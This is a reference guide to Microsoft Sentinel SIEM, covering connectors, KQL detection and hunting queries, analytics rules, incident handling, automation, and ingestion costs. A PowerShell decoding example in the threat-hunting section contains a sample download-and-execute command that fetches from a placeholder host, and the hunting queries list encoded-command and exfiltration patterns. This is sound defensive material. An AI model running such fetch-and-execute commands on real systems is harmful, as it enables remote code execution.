Microsoft Sentinel

Microsoft Sentinel cloud SIEM — workspace configuration, analytics rules, and incident workflows.

Architecture Overview

Sentinel is a cloud-native SIEM built on Azure Log Analytics. Data flows in through connectors, is stored in Log Analytics workspace tables, and scheduled analytics rules run KQL queries against those tables to generate incidents. Automation rules and playbooks (Logic Apps) handle response.

Data Connectors  →  Log Analytics Workspace  →  Analytics Rules  →  Incidents
                         (tables)                  (KQL queries)       ↓
                                                                  Automation Rules
                                                                       ↓
                                                                  Playbooks (Logic Apps)

Data Connectors

List active data connectors via Azure CLI
az sentinel data-connector list \
  --resource-group rg-sentinel \
  --workspace-name law-sentinel \
  --output table

Common connectors and the tables they populate:

Connector                         Tables                            Data
Azure AD                          SigninLogs, AuditLogs             Authentication events, directory changes
Microsoft 365                     OfficeActivity                    SharePoint, Exchange, Teams audit events
Microsoft Defender for Endpoint   DeviceEvents, DeviceLogonEvents   Endpoint telemetry, process creation
Syslog (CEF)                      Syslog, CommonSecurityLog         Linux hosts, firewalls, network devices
Windows Security Events           SecurityEvent                     Windows Event Log (logon, process, policy)
AWS CloudTrail                    AWSCloudTrail                     AWS API calls

Key Tables and Their Fields

SecurityEvent — Windows Security Event Log
SecurityEvent
| where TimeGenerated > ago(1h)
| where EventID == 4625  // Failed logon
| project TimeGenerated, Computer, Account, LogonType, IpAddress, Activity
| take 20
SigninLogs — Azure AD authentication
SigninLogs
| where TimeGenerated > ago(24h)
| where ResultType != "0"  // Non-zero = failure
| project TimeGenerated, UserPrincipalName, AppDisplayName, IPAddress,
          ResultType, ResultDescription, Location
| take 50
AuditLogs — Azure AD directory changes
AuditLogs
| where TimeGenerated > ago(24h)
| where OperationName has "Add member to role"
| project TimeGenerated, OperationName,
          Initiator = tostring(InitiatedBy.user.userPrincipalName),
          Target = tostring(TargetResources[0].displayName)
CommonSecurityLog — CEF events from network devices
CommonSecurityLog
| where TimeGenerated > ago(1h)
| where DeviceVendor == "Palo Alto Networks"
| where Activity == "THREAT"
| project TimeGenerated, SourceIP, DestinationIP, Activity, DeviceAction, Message
| take 20

Analytics Rules

Analytics rules are scheduled KQL queries that generate alerts when results cross the trigger threshold; alerts are then grouped into incidents.

Create an analytics rule via Azure CLI — brute force detection
az sentinel alert-rule create \
  --resource-group rg-sentinel \
  --workspace-name law-sentinel \
  --rule-name "Brute Force - Multiple Failed Logins" \
  --kind Scheduled \
  --query "SecurityEvent | where EventID == 4625 | summarize count() by IpAddress, bin(TimeGenerated, 5m) | where count_ > 10" \
  --query-frequency PT5M \
  --query-period PT5M \
  --severity Medium \
  --trigger-operator GreaterThan \
  --trigger-threshold 0
Common analytics rule patterns
// Brute force — 10+ failed logins from same IP in 5 minutes
SecurityEvent
| where EventID == 4625
| summarize FailureCount = count() by IpAddress, bin(TimeGenerated, 5m)
| where FailureCount >= 10

// Account added to Domain Admins
SecurityEvent
| where EventID in (4728, 4732, 4756)
| where TargetAccount has "Domain Admins"
| project TimeGenerated, SubjectAccount, TargetAccount, Computer

// Anomalous sign-in location
SigninLogs
| where ResultType == "0"
| summarize Locations = make_set(Location) by UserPrincipalName
| where array_length(Locations) > 3
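The brute-force pattern above can be modeled outside KQL to see the logic clearly: a minimal Python sketch of the same tumbling 5-minute bins keyed by source IP (the timestamps, IPs, and threshold are illustrative assumptions, not Sentinel data):

```python
from collections import Counter
from datetime import datetime, timedelta

def brute_force_ips(events, window=timedelta(minutes=5), threshold=10):
    """Mimic: summarize count() by IpAddress, bin(TimeGenerated, 5m) | where count_ >= threshold.

    events: iterable of (timestamp: datetime, ip: str) failed-logon records.
    Returns the set of (ip, bin_start) pairs meeting the threshold.
    """
    bins = Counter()
    for ts, ip in events:
        # bin(TimeGenerated, 5m): floor the timestamp to the start of its window
        bin_start = datetime.min + ((ts - datetime.min) // window) * window
        bins[(ip, bin_start)] += 1
    return {key for key, n in bins.items() if n >= threshold}

# Usage: 12 failures from one IP inside a single bin trigger; a lone failure does not
base = datetime(2024, 1, 1, 12, 0)
events = [(base + timedelta(seconds=10 * i), "203.0.113.5") for i in range(12)]
events += [(base + timedelta(seconds=30), "198.51.100.9")]  # single failure: below threshold
hits = brute_force_ips(events)
```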

Incidents

List open incidents via Azure CLI
az sentinel incident list \
  --resource-group rg-sentinel \
  --workspace-name law-sentinel \
  --filter "properties/status eq 'New'" \
  --output table
Update incident status — assign and set to Active
az sentinel incident update \
  --resource-group rg-sentinel \
  --workspace-name law-sentinel \
  --incident-id <incident-id> \
  --status Active \
  --owner-object-id <analyst-object-id>
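Under the hood, these CLI commands call the ARM REST API for the `Microsoft.SecurityInsights` resource provider. A sketch of how the incident endpoint URL is assembled (the `api-version` value is an assumption; check the current REST reference before scripting against it):

```python
def incident_url(subscription, rg, workspace, incident_id,
                 api_version="2023-02-01"):  # assumed api-version; verify against current docs
    """Build the ARM REST endpoint behind `az sentinel incident update`."""
    return (
        "https://management.azure.com"
        f"/subscriptions/{subscription}/resourceGroups/{rg}"
        f"/providers/Microsoft.OperationalInsights/workspaces/{workspace}"
        f"/providers/Microsoft.SecurityInsights/incidents/{incident_id}"
        f"?api-version={api_version}"
    )

url = incident_url("00000000-sub", "rg-sentinel", "law-sentinel", "abc-123")
```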

Workbooks

Workbooks are interactive dashboards built on KQL queries. They visualize trends and support drill-down investigation.

Useful built-in workbooks to enable
- Azure AD Sign-in Logs          — failed logins, MFA gaps, risky sign-ins
- Security Events                — Windows event volume, anomalies
- Insecure Protocols             — NTLM, Kerberos, cleartext auth
- Threat Intelligence            — IOC matches across all data sources
- Investigation Insights         — Entity-centric investigation support

Automation Rules and Playbooks

Automation rule structure — auto-close known false positives
Trigger:    When incident is created
Condition:  Analytics rule name contains "Known Scanner IP"
Action:     Change status to Closed
            Add tag: "auto-closed"
            Classification: False Positive
Trigger a playbook (Logic App) from automation rule
Trigger:    When incident is created
Condition:  Severity == High
Action:     Run playbook "Enrich-IP-ThreatIntel"
            Run playbook "Notify-SOC-Teams-Channel"
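The two rules above reduce to a simple trigger/condition/action evaluation. A hypothetical Python model of that flow (the rule shape and field names are illustrative, not the Sentinel automation-rule API):

```python
def evaluate_automation_rules(incident, rules):
    """Return the ordered list of actions from every rule whose conditions all match."""
    actions = []
    for rule in rules:
        if all(cond(incident) for cond in rule["conditions"]):
            actions.extend(rule["actions"])
    return actions

rules = [
    {   # auto-close known false positives
        "conditions": [lambda i: "Known Scanner IP" in i["ruleName"]],
        "actions": ["status=Closed", "tag=auto-closed", "classification=FalsePositive"],
    },
    {   # enrich and notify on high severity
        "conditions": [lambda i: i["severity"] == "High"],
        "actions": ["playbook:Enrich-IP-ThreatIntel", "playbook:Notify-SOC-Teams-Channel"],
    },
]

incident = {"ruleName": "Brute Force - Multiple Failed Logins", "severity": "High"}
actions = evaluate_automation_rules(incident, rules)
```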

Threat Hunting

Hunt for encoded PowerShell commands — common malware technique
SecurityEvent
| where EventID == 4688  // Process creation
| where CommandLine has_any ("-enc", "-EncodedCommand", "FromBase64String")
| project TimeGenerated, Computer, Account, Process, CommandLine
| take 50
Hunt for lateral movement — remote logons across multiple hosts
SecurityEvent
| where EventID == 4624
| where LogonType == 10  // RemoteInteractive (RDP)
| summarize TargetHosts = dcount(Computer) by Account, bin(TimeGenerated, 1h)
| where TargetHosts >= 3
Hunt for data exfiltration — large outbound transfers
CommonSecurityLog
| where DeviceAction == "allow"
| where SentBytes > 50000000  // 50 MB
| project TimeGenerated, SourceIP, DestinationIP, DestinationPort, SentBytes
| order by SentBytes desc
| take 20
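When the encoded-PowerShell hunt surfaces a hit, the `-EncodedCommand` payload is Base64 over UTF-16LE text. A small Python helper for decoding it during triage (a standalone sketch, not tied to any Sentinel API; the sample command is illustrative):

```python
import base64

def decode_powershell_enc(blob: str) -> str:
    """Decode a PowerShell -EncodedCommand payload (Base64 of UTF-16LE text)."""
    return base64.b64decode(blob).decode("utf-16-le")

# Usage: round-trip a sample command the way PowerShell encodes it
sample = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')"
payload = base64.b64encode(sample.encode("utf-16-le")).decode()
decoded = decode_powershell_enc(payload)
```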

Cost Management

Sentinel charges per GB of data ingested into Log Analytics. Control costs by:

1. Filter noisy log sources at the connector (don't ingest everything)
2. Use the Basic Logs tier for high-volume, low-value tables (much lower per-GB cost, but limited KQL and shorter interactive retention)
3. Set data retention per table — hot (interactive) vs archive (cheap, rehydrate to query)
4. Use commitment tiers (100, 200, 500 GB/day) for predictable discounts
5. Monitor ingestion: Usage table tracks per-table volume
Check ingestion volume by table — find the cost drivers
Usage
| where TimeGenerated > ago(30d)
| summarize TotalGB = sum(Quantity) / 1024 by DataType
| order by TotalGB desc
| take 15
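Point 4 above is a break-even calculation: once steady daily ingestion approaches a tier's commitment, the flat tier price beats pay-as-you-go. A sketch with placeholder per-GB prices (all dollar figures are assumptions for illustration; real prices vary by region and change over time):

```python
def cheapest_option(daily_gb, payg_per_gb=4.30, tiers=None):
    """Compare daily pay-as-you-go cost vs commitment tiers. Prices are illustrative only."""
    if tiers is None:
        tiers = {100: 296.0, 200: 548.0, 500: 1308.0}  # assumed flat daily tier prices
    costs = {"pay-as-you-go": daily_gb * payg_per_gb}
    for tier_gb, tier_price in tiers.items():
        # simplification: overage beyond the commitment bills at the tier's effective rate
        overage = max(0.0, daily_gb - tier_gb) * (tier_price / tier_gb)
        costs[f"{tier_gb} GB/day tier"] = tier_price + overage
    return min(costs, key=costs.get)

choice = cheapest_option(150)  # 150 GB/day of steady ingestion
```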